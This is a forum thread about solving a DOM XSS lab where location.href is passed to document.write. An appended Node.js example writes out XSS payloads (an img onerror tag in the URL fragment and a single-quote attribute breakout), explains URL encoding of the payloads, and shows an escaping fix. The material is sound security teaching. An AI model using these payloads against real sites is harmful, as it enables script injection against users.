DOMXSS - how to exploit this lab?

I’ve been using the Google Firing Range site to learn about DOMXSS vulnerabilities. However, I’ve come across one that I can’t seem to solve:

  var payload = window.location.href; // source: the page's own URL, which the visitor (or an attacker's link) controls
  document.write(payload);            // sink: the raw URL string is parsed as HTML

The source is location.href and the sink is document.write. How can an attacker control location.href? If anyone could help me solve/understand this, I would really appreciate it.


You can play with the URL without leaving the current page. :slight_smile:

For example,

-> all of them are the same page, and location.href will see ‘payload’. :wink:


But how can I get alert(1)?
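A worked version of the answer above, added here as an editor's example (it is not code from the thread, from Google Firing Range, or from either poster). It simulates the lab's `location.href` -> `document.write` flow as plain string functions so it runs under Node.js, and uses Node's WHATWG-compliant `URL` class to show exactly what the sink receives when an attacker puts a payload in the fragment, the query or the path. The page URL, the payloads, and the single-quoted attribute variant of the sink are assumptions for illustration.

```javascript
// Added example (not from the thread or the lab). Simulates the lab's
// source -> sink flow with string functions; `URL` is Node's built-in
// WHATWG implementation, so `href` here is what window.location.href
// would return in a spec-compliant browser.

// The pattern quoted in the question: raw href straight into document.write.
// Here the "write" just returns the HTML the browser would parse.
function vulnerableTextSink(href) {
  const payload = href; // var payload = window.location.href;
  return payload;       // document.write(payload);
}

// Hypothetical variant (constructed): same source, but the href is written
// into a single-quoted attribute, a common real-world shape for this sink.
function vulnerableAttrSink(href) {
  return `<a href='${href}'>permalink</a>`;
}

// Hardened counterpart: encode the HTML-significant characters before
// interpolating. In a real page prefer textContent/setAttribute over
// document.write entirely; escaping is shown because it is testable here.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}
function hardenedAttrSink(href) {
  return `<a href='${escapeHtml(href)}'>permalink</a>`;
}

// What the victim's browser reports as location.href after following an
// attacker-built link. `where` selects the part of the URL the payload sits in.
// The fragment is the interesting case: it is never sent to the server, so no
// server-side filter sees it; only the page's own JavaScript does.
function victimHref(base, where, payload) {
  const u = new URL(base);
  if (where === 'hash') u.hash = payload;
  else if (where === 'query') u.searchParams.set('q', payload);
  else if (where === 'path') u.pathname = '/' + payload;
  else throw new Error('unknown location: ' + where);
  return u.href;
}

// Does an attacker-supplied '<' reach the text sink intact? The WHATWG URL
// serializer percent-encodes '<' and '>' in path, query and fragment, so a
// raw-tag payload arrives as %3Cimg...%3E and is parsed as text, not markup.
function rawTagReachesSink(base, where) {
  const html = vulnerableTextSink(
    victimHref(base, where, '<img src=x onerror=alert(1)>'));
  return html.includes('<img');
}

// A single quote is NOT in the fragment percent-encode set (nor are '/', '=',
// '(' and ')'), so an attribute context can still be broken out of even when
// '<' cannot be injected. The HTML tokenizer accepts '/' as an attribute separator.
function quoteBreakout(base) {
  const payload = "'/onmouseover=alert(1)/x='";
  const href = victimHref(base, 'hash', payload);
  return {
    href,
    vulnerable: vulnerableAttrSink(href),
    hardened: hardenedAttrSink(href),
  };
}

const BASE = 'https://lab.example/address/location.href'; // constructed page URL

function main() {
  for (const where of ['hash', 'query', 'path']) {
    console.log(where, 'raw <img> reaches sink:', rawTagReachesSink(BASE, where));
  }
  const breakout = quoteBreakout(BASE);
  console.log(breakout.href);
  console.log(breakout.vulnerable);
  console.log(breakout.hardened);
}
main();
```

Run it with `node` and compare the three `rawTagReachesSink` results with what your own browser does: a serializer that follows the WHATWG URL standard turns `#<img ...>` into `#%3Cimg%20...%3E`, so `document.write(location.href)` in a text context prints the encoded string instead of creating an element. Whether the lab pops `alert(1)` for you therefore depends on whether your browser encodes those characters in `location.href` and on whether the page decodes the URL before writing it. Characters outside the encode set, such as `'` and `/`, pass through unchanged, which is why the attribute-context variant is still exploitable while the escaped version is not. The fix is to never write the URL into markup; if the page must display it, assign it to `textContent`.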